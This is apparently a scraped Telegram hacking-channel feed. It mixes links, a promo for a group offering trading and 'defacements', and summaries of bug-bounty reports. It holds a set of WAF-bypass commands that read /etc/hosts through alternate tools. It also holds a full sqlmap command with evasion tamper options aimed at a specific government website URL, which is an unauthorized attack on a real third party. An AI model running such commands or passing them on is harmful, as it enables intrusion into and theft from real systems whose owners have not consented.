hacking vidhya
Open in Telegram
No data
Subscribers
-824 hours
-137 days
+3730 days
Posts Archive
📍Burp Suite + Claude AI: Connect Using MCP Server (2025 Setup)
https://hacklido.com/blog/1051-burp-suite-claude-ai-connect-using-mcp-server-2025-setup
🔥Special Roadmap For Cybersecurity Students
⚠️Specially For Beginners ⚠️
Credit: @lexlegion @lexlegionOfficial
(☠️ Lèx Légîøñ ☠️)
CHAPTER - 25
Hello everyone this year we are moving one more step forward this time we are merging our hacking discussion into another group which is the new era in it sector In this Group You Find Lot Of Things Like
1.Hacking
2.Live classes
3.Buying&Selling
4.Daily Updated Content
5.FreeLancing Projects
6.A Special V.I.P Channel
7.Hackers Event
8.Talking With Experts Which Are Master in Various Things
9.Defacements On Special Occasions
10.Road Maps
11.Each And Every Type of course
12. GROUP ONLINE SHOP AND TOOL
I HOPE YOU LEARN SO MANY NEW THINGS FROM THIS GROUP AND EVERY DOUBT AND QUERY GONNA BE SOLVED OUT AT EVERY LIVE SESSION WHICH IS ON GROUP AND MAKE YOU BETTER IN CYBERSECURITY FIELDS.
THANKYOU
CYBER GENETICS
https://t.me/+08TaWWdwGTo5ZjQ1
🔍 Time-Based SQLi Scanner - Detects vulnerabilities in the TO MiniProgram plugin via the
/getcomments endpoint
💾 Multi-Target - Support for unit (-u) or list (-l) testing with multithreading
📊 Automatic Reporting - Exports vulnerable results to vulnerable.txt
🎨 Professional Interface - ASCII banner and colored output for better readability
⚠️ Ethical Use - For authorized testing only, no embedded malicious payloads
python3 scanner.py -l targets.txt -t 10 -d 3⚡Bypass Series for bug hunters😎
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
Don’t forget to drop your reactions & stars! ⭐️✨ — Your support keeps me going! 🔋🚀
🔗 @hacking_vidhya
🏦 Ruby on Rails Report
⚡ Title: 1-Click Cross-Site Scripting via Custom Configuration in SafeListSanitizer
🔍 Reporter: leonsirio (No name)
📋 Details:
└ 📊 Status: informative
└ ⚡ Severity: Medium
└ 🎯 CWE: Cross-site Scripting (XSS) - Generic
└ 🔢 CVE: None
⏰ Timeline:
└ 🔓 Disclosed: 2025-04-09 02:02:59 UTC
└ 📝 Created: 2025-02-23 17:03:07 UTC
+2
python3 sqlmap.py -u "https://mis.pc.go.tz/pcmis.data/view/modules/registration/premises-validator-check.php?id=2" --random-agent --tamper=space2comment,randomcase --time-sec 5 --delay 3 --dbs --batch -vvv
🏦 Adobe Report
📝 Title: Disclosure of git metadata and springboot actuator information
🔍 Reporter: jf0x0r (Juan Felipe Osorio Z)
📋 Details:
└ 📊 Status: resolved
└ ⚡️ Severity: Low
└ 🎯 CWE: Information Disclosure
└ 🔢 CVE: None
⏰ Timeline:
└ 🔓 Disclosed: 2025-04-07 08:38:53 UTC
└ 📝 Created: 2024-07-21 21:01:07 UTC
📍 Google announces Sec-Gemini v1, a new experimental cybersecurity model
http://security.googleblog.com/2025/04/google-launches-sec-gemini-v1-new.html
Hello Telegram Team This Channel Does Not Promote Any Illegal Activities We Are Following Telegram Guidelines Thank You @Rove
مرحباً بفريق Telegram، هذه القناة لا تروج لأي أنشطة غير قانونية، نحن نتبع إرشادات Telegram، شكرًا لك @Rove
Привет, команда Telegram. Этот канал не пропагандирует никакую незаконную деятельность. Мы следуем правилам Telegram. Спасибо @Rove.
